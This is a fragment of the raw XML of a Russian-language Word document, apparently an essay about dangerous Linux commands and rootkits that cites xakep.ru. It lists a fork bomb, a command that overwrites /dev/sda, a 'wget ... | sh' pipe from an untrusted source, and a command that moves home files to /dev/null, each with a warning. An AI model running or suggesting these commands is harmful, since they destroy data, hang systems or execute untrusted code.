      <w:r w:rsidRPr="007A07AE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>:(){:|:&amp;};:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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уск слишком большого количества процессов приведёт к зависанию системы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A07AE" w:rsidRPr="007A07AE" w:rsidRDefault="007A07AE" w:rsidP="007A07AE">
      <w:pPr>
        <w:pStyle w:val="a5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Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>any_command &gt; /dev/sda</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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пись потока данных на устройство /dev/sda, который заменит все файлы на нём.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A07AE" w:rsidRPr="007A07AE" w:rsidRDefault="007A07AE" w:rsidP="007A07AE">
      <w:pPr>
        <w:pStyle w:val="a5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7A07AE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>wget http://sumber_tak_terpercaya -O- | sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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чивает шелл-скрипт из ненадёжного источника и исполняет его после окончания скачивания.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A07AE" w:rsidRPr="007A07AE" w:rsidRDefault="007A07AE" w:rsidP="007A07AE">
      <w:pPr>
        <w:pStyle w:val="a5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Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>mv /home/username/* /dev/null</w:t>
      </w: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07A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A07AE" w:rsidRPr="007A07AE" w:rsidRDefault="007A07AE" w:rsidP="007A07AE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7A07AE" w:rsidRPr="001E6DD4" w:rsidRDefault="007A07AE" w:rsidP="001E6DD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E6DD4" w:rsidRDefault="001E6DD4" w:rsidP="00301EB0">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001E6DD4" w:rsidRPr="00301EB0" w:rsidRDefault="001E6DD4" w:rsidP="00301EB0">
      <w:pPr>
        <w:ind w:firstLine="36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5F96" w:rsidRPr="00301EB0" w:rsidRDefault="00CD5F96" w:rsidP="00CD5F96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чник:  </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5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ttps</w:t>
      </w:r>
      <w:r w:rsidRPr="00301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r w:rsidRPr="00CD5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akep</w:t>
      </w:r>
      <w:r w:rsidRPr="00301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D5F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</w:t>
      </w:r>
      <w:r w:rsidRPr="00301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2012/04/03/58516/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009831E9" w:rsidRPr="00301EB0" w:rsidRDefault="007C0561" w:rsidP="0040515C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bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="007C056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http://rootkits.com/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00941A67" w:rsidRPr="00EB34FE" w:rsidRDefault="00941A67" w:rsidP="00D90B0B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90B0B" w:rsidRPr="00EB34FE" w:rsidRDefault="00D90B0B" w:rsidP="00FC3CD0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A415D" w:rsidRPr="00EB34FE" w:rsidRDefault="00AA415D" w:rsidP="00AA415D">
      <w:pPr>
        <w:pStyle w:val="a5"/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9562E9" w:rsidRPr="00EB34FE" w:rsidRDefault="009562E9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="009562E9" w:rsidRPr="00EB3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9E9" w:rsidRDefault="001349E9" w:rsidP="006F520C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="001349E9" w:rsidRDefault="001349E9" w:rsidP="006F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9E9" w:rsidRDefault="001349E9" w:rsidP="006F520C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="001349E9" w:rsidRDefault="001349E9" w:rsidP="006F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549A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B9D25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AF2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EB9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C0A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="66869AA8"/>
    <w:lvl w:ilvl="0" w:tplc="1FAA1B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46D6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9246FB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F818C6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4E6C1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E9"/>
    <w:rsid w:val="00040D40"/>
    <w:rsid w:val="00066E33"/>
    <w:rsid w:val="00132513"/>
    <w:rsid w:val="001349E9"/>
    <w:rsid w:val="001E6DD4"/>
    <w:rsid w:val="00262507"/>
    <w:rsid w:val="00301EB0"/>
    <w:rsid w:val="003950D8"/>
    <w:rsid w:val="0040515C"/>
    <w:rsid w:val="00555D29"/>
    <w:rsid w:val="0060235E"/>
    <w:rsid w:val="00691656"/>
    <w:rsid w:val="006972F1"/>
    <w:rsid w:val="006D3332"/>
    <w:rsid w:val="006F520C"/>
    <w:rsid w:val="007A07AE"/>
    <w:rsid w:val="007C0561"/>
    <w:rsid w:val="007E1541"/>
    <w:rsid w:val="00873658"/>
    <w:rsid w:val="008D29B7"/>
    <w:rsid w:val="00941A67"/>
    <w:rsid w:val="009562E9"/>
    <w:rsid w:val="00962D36"/>
    <w:rsid w:val="009830E2"/>
    <w:rsid w:val="009831E9"/>
    <w:rsid w:val="00A76E47"/>
    <w:rsid w:val="00AA415D"/>
    <w:rsid w:val="00AC340D"/>
    <w:rsid w:val="00B47D75"/>
    <w:rsid w:val="00C12C5A"/>
    <w:rsid w:val="00CD5F96"/>
    <w:rsid w:val="00D90B0B"/>
    <w:rsid w:val="00DC75D6"/>
    <w:rsid w:val="00DF2329"/>
    <w:rsid w:val="00DF2795"/>
    <w:rsid w:val="00E57DAA"/>
    <w:rsid w:val="00E85734"/>
    <w:rsid w:val="00EB34FE"/>
    <w:rsid w:val="00F910A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30BFB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F0D98754-53F4-4D6B-A5C6-5FEE354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656"/>
  </w:style>
  <w:style w:type="character" w:styleId="a4">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006916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950D8"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="txb">
    <w:name w:val="txb"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="006F520C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="endnote text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a7"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006F520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520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F520C"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a9">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="0040515C"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTML">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001E6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45948/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://xakep.ru/2008/03/20/42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otki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1%83%D1%82%D0%BA%D0%B8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akep.ru/local/search/search.asp?text=%D0%A0%D1%83%D1%81%D1%81%D0%B8%D0%BD%D0%BE%D0%B2%D0%B8%D1%87&amp;p=1" TargetMode="Externa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oot_(%D1%81%D1%83%D0%BF%D0%B5%D1%80%D0%BF%D0%BE%D0%BB%D1%8C%D0%B7%D0%BE%D0%B2%D0%B0%D1%82%D0%B5%D0%BB%D1%8C)" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.microsoft.com/technet/sysinternals/Utilities/RootkitRevealer.m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6C93-B80D-4CAA-882C-7782406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1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-03-13T21:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-04-20T22:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>